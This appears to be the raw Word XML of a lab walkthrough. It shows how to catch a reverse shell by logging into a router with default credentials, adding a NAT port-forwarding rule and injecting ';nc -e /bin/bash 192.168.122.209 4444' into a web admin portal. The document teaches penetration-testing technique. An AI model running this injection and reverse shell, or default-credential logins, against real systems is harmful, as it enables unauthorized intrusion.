    <w:p w14:paraId="71898D93" w14:textId="77777777" w:rsidR="001A5270" w:rsidRPr="00EF4D62" w:rsidRDefault="001A5270" w:rsidP="001A5270">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1    Listener (think: 'thing that catches reverse shell')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45092E2C" w14:textId="77777777" w:rsidR="001A5270" w:rsidRPr="00EF4D62" w:rsidRDefault="001A5270" w:rsidP="001A5270">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2   Port Forwarding rule (think: 'thing that forwards reverse shell from router to kali')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3D2BDF" w14:textId="77777777" w:rsidR="001A5270" w:rsidRDefault="001A5270" w:rsidP="001A5270">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3   Payload (think: 'thing that sends you a reverse shell')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6BF38" w14:textId="244CF4D3" w:rsidR="001A5270" w:rsidRDefault="001A5270" w:rsidP="001A5270">
      <w:r>
        <w:t>We have already established our listener way back in step 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C48B1C0" w14:textId="4238A2A8" w:rsidR="001A5270" w:rsidRDefault="001A5270" w:rsidP="001A5270">
      <w:r w:rsidRPr="001A5270">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11C4D050" wp14:editId="46785944">
            <wp:extent cx="4229690" cy="743054"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="666612240"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2240" name="Picture 1" descr="A close up of numbers&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4229690" cy="743054"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F9B24" w14:textId="0966B206" w:rsidR="001A5270" w:rsidRDefault="00965327" w:rsidP="001A5270">
      <w:r>
        <w:t>Remember your gateway is your router, so a simple route – n command will work. But to break it down:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1073E601" w14:textId="77777777" w:rsidR="00965327" w:rsidRPr="00965327" w:rsidRDefault="00965327" w:rsidP="00965327">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00965327">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>route:</w:t>
      </w:r>
      <w:r w:rsidRPr="00965327">
        <w:t xml:space="preserve"> The command used to view or manipulate the IP routing table on Unix-like operating systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48121B07" w14:textId="77777777" w:rsidR="00965327" w:rsidRDefault="00965327" w:rsidP="00965327">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00965327">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-n:</w:t>
      </w:r>
      <w:r w:rsidRPr="00965327">
        <w:t xml:space="preserve"> Specifies the option to display numerical addresses instead of resolving them to hostnames. This can make the output more concise and faster to generate, as it avoids the need for DNS resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFBF048" w14:textId="25C9C187" w:rsidR="00965327" w:rsidRDefault="00965327" w:rsidP="00965327">
      <w:r>
        <w:t xml:space="preserve">This produces something like this: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7BFE4" w14:textId="67411355" w:rsidR="00965327" w:rsidRDefault="00965327" w:rsidP="00965327">
      <w:r w:rsidRPr="00965327">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="468F892F" wp14:editId="402FB173">
            <wp:extent cx="5943600" cy="1031240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="177429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9595" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1031240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E05EAA" w14:textId="1CBC75C9" w:rsidR="00965327" w:rsidRDefault="00965327" w:rsidP="00965327">
      <w:r>
        <w:t xml:space="preserve">Our router is then 192.168.2.1 and this is the device that will serve as our “port forwarding rule” </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>portion</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="44DA307B" w14:textId="13BCE69D" w:rsidR="00965327" w:rsidRPr="00965327" w:rsidRDefault="00965327" w:rsidP="00965327">
      <w:r w:rsidRPr="00965327">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50E7E1B0" wp14:editId="4B9ACBC8">
            <wp:extent cx="4352925" cy="2025319"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="154600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7443" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4353578" cy="2025623"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="751A72BA" w14:textId="6084B6E8" w:rsidR="00965327" w:rsidRDefault="00965327" w:rsidP="001A5270">
      <w:r>
        <w:t xml:space="preserve">Where to find the default credentials for a router? Use Google. (again, default credentials are not usually found in the real world, but worth a shot) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F0377D" w14:textId="356D43A4" w:rsidR="00A75607" w:rsidRDefault="00A75607" w:rsidP="001A5270">
      <w:r>
        <w:t>Once you’re in Go to “Firewall” and then “NAT”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE7DCC5" w14:textId="38E52D0C" w:rsidR="00A75607" w:rsidRDefault="00A75607" w:rsidP="001A5270">
      <w:r w:rsidRPr="00A75607">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AFE06EA" wp14:editId="25BA3F05">
            <wp:extent cx="4313903" cy="2371725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2107404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4558" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4318108" cy="2374037"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8A8080" w14:textId="70E90812" w:rsidR="00A75607" w:rsidRDefault="00A75607" w:rsidP="001A5270">
      <w:r>
        <w:t>We “add” a rule and go to the configuration page. We’ll need to know our IP address so a quick “ifconfig” will give us that. And we need to remember our port that we set up with “nc” (here 4444)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20957464" w14:textId="04ACE262" w:rsidR="00A75607" w:rsidRDefault="00A75607" w:rsidP="001A5270">
      <w:r w:rsidRPr="00A75607">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77758C6F" wp14:editId="6453DE32">
            <wp:extent cx="3752850" cy="412172"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="20976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457" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3824672" cy="420060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4806DB" w14:textId="393369B3" w:rsidR="00A75607" w:rsidRDefault="00A75607" w:rsidP="001A5270">
      <w:r>
        <w:t xml:space="preserve">And we insert this info into the destination forms on our “rule page” hence directing traffic to our port on our machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116F3E69" w14:textId="6AAD4FAD" w:rsidR="00A75607" w:rsidRDefault="004520EE" w:rsidP="001A5270">
      <w:r w:rsidRPr="004520EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15D684EE" wp14:editId="2FA1A8BC">
            <wp:extent cx="5943600" cy="2378075"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1013922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22738" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2378075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1163E5AC" w14:textId="7402AA1C" w:rsidR="004520EE" w:rsidRDefault="004520EE" w:rsidP="001A5270">
      <w:r>
        <w:t>Then save: Always apply changes after saving.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F630F96" w14:textId="77777777" w:rsidR="004520EE" w:rsidRDefault="004520EE" w:rsidP="001A5270"/>
    <w:p w14:paraId="6F5A615D" w14:textId="77777777" w:rsidR="004520EE" w:rsidRDefault="004520EE" w:rsidP="001A5270"/>
    <w:p w14:paraId="7978FE1F" w14:textId="69FAF363" w:rsidR="004520EE" w:rsidRDefault="004520EE" w:rsidP="001A5270">
      <w:r>
        <w:t xml:space="preserve">The last part we are at here is the “payload”… Remember how we have access to our web-server admin portal? </w:t>
      </w:r>
      <w:r w:rsidRPr="004520EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B581D64" wp14:editId="7DC2F1E8">
            <wp:extent cx="5943600" cy="1763395"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="204546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9202" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1763395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CB57FD" w14:textId="4185F1D6" w:rsidR="004520EE" w:rsidRDefault="004520EE" w:rsidP="001A5270">
      <w:r>
        <w:t>We use the command: “;nc -e /bin/bash 192.168.122.209 4444”, we will break down the command, but we need to know why we are using 192.168.122.209 first. It is the IP address of the router (not the gateway address) that we are using for our port forwarding rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047B01F1" w14:textId="20C3BE9F" w:rsidR="004520EE" w:rsidRDefault="004520EE" w:rsidP="001A5270">
      <w:r w:rsidRPr="004520EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10749735" wp14:editId="63FF0C93">
            <wp:extent cx="5943600" cy="2944495"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="77235776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57764" name="Picture 1" descr="A diagram of a network&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2944495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="299BD183" w14:textId="7D907537" w:rsidR="004520EE" w:rsidRDefault="004520EE" w:rsidP="001A5270">
      <w:r>
        <w:t xml:space="preserve">As for the rest of the command, 4444 is the port we </w:t>
      </w:r>
      <w:r w:rsidR="00CB1F07">
        <w:t xml:space="preserve">have set up, nc is for netcat, and as for the rest: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A466999" w14:textId="77777777" w:rsidR="00CB1F07" w:rsidRPr="00CB1F07" w:rsidRDefault="00CB1F07" w:rsidP="00CB1F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB1F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-e:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1F07">
        <w:t xml:space="preserve"> This is an option used with the nc (netcat) command. In this context, it specifies that the following argument will be a command to execute after a connection is established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4DFDCE" w14:textId="77777777" w:rsidR="00CB1F07" w:rsidRDefault="00CB1F07" w:rsidP="00CB1F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB1F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/bin/bash:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB1F07">
        <w:t xml:space="preserve"> This is the command to be executed. It's specifying the path to the Bash shell on the target system. Bash is a commonly used command processor or shell in Unix-like operating systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A72750" w14:textId="5740139D" w:rsidR="00CB1F07" w:rsidRPr="00CB1F07" w:rsidRDefault="00CB1F07" w:rsidP="00CB1F07">
      <w:r>
        <w:t xml:space="preserve">The command will “hang” for a bit, because it’s not going to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web server’s network, but to ours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B92DC18" w14:textId="0EE41A8C" w:rsidR="00B0570A" w:rsidRDefault="00CB1F07">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A9260F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> remember that netcat stands for network concatenate, which in simple terms means the joining of two networks, which we have just done.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DE205E" w14:textId="466D4A30" w:rsidR="00CB1F07" w:rsidRDefault="00CB1F07">
      <w:r>
        <w:t>Now we just validate what we just did, we go back to our nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nlvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> screen on our kali machine. And we should see the connection established: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AE9AC8" w14:textId="7DEB7AFA" w:rsidR="0070631B" w:rsidRDefault="0070631B">
      <w:r w:rsidRPr="0070631B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DD9B6D1" wp14:editId="381667EE">
            <wp:extent cx="5943600" cy="1465580"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="432285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85136" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1465580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8244D" w14:textId="2E71B9DA" w:rsidR="0070631B" w:rsidRDefault="0070631B">
      <w:r>
        <w:t xml:space="preserve">And as you can </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>see</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we are now connected to our target network’s IP and a reverse shell is made!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30403C6D" w14:textId="77777777" w:rsidR="0070631B" w:rsidRDefault="0070631B"/>
    <w:p w14:paraId="452D96E7" w14:textId="4D710913" w:rsidR="00CB1F07" w:rsidRDefault="00CB1F07"/>
    <w:p w14:paraId="29A7ABF6" w14:textId="77777777" w:rsidR="00CB1F07" w:rsidRDefault="00CB1F07"/>
    <w:sectPr w:rsidR="00CB1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3C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F924046"/>
    <w:lvl w:ilvl="0" w:tplc="90581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80565"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3FD4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4262E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E13C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233B00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="47CE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487ABE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="232E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1C4117"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B944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6356F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE42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356999">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1549150369">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="754935397">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="989865464">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1894729112">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1740860653">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="7705933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70A"/>
    <w:rsid w:val="0002028E"/>
    <w:rsid w:val="000D62A5"/>
    <w:rsid w:val="0018109B"/>
    <w:rsid w:val="001A5270"/>
    <w:rsid w:val="00205213"/>
    <w:rsid w:val="0026026D"/>
    <w:rsid w:val="004520EE"/>
    <w:rsid w:val="0047632A"/>
    <w:rsid w:val="004B17CD"/>
    <w:rsid w:val="00564591"/>
    <w:rsid w:val="006231BD"/>
    <w:rsid w:val="0070631B"/>
    <w:rsid w:val="007C0F45"/>
    <w:rsid w:val="00874D05"/>
    <w:rsid w:val="008E7D6B"/>
    <w:rsid w:val="00965327"/>
    <w:rsid w:val="009951E3"/>
    <w:rsid w:val="009D16B7"/>
    <w:rsid w:val="00A75607"/>
    <w:rsid w:val="00A9260F"/>
    <w:rsid w:val="00B0570A"/>
    <w:rsid w:val="00C6168C"/>
    <w:rsid w:val="00CB1F07"/>
    <w:rsid w:val="00D71C69"/>
    <w:rsid w:val="00DD6ED8"/>
    <w:rsid w:val="00E567C9"/>
    <w:rsid w:val="00EE793D"/>
    <w:rsid w:val="00EF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7D54F8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2A3CCFD1-CF8F-456B-97C6-F1C3A5DF5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2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62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D62A5"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00EE793D"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E567C9"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E56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34597">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="190609135">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="783187828">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1063988259">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1400833623">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1476753801">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1512330060">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="165217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Pages>
  <Words>1696</Words>
  <Characters>8618</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>183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Prato</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>David Prato</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-27T22:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-28T20:03:00Z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2c48b671-767f-4cd4-8138-0aa4233caa7f</vt:lpwstr>
  </property>
</Properties>
</file>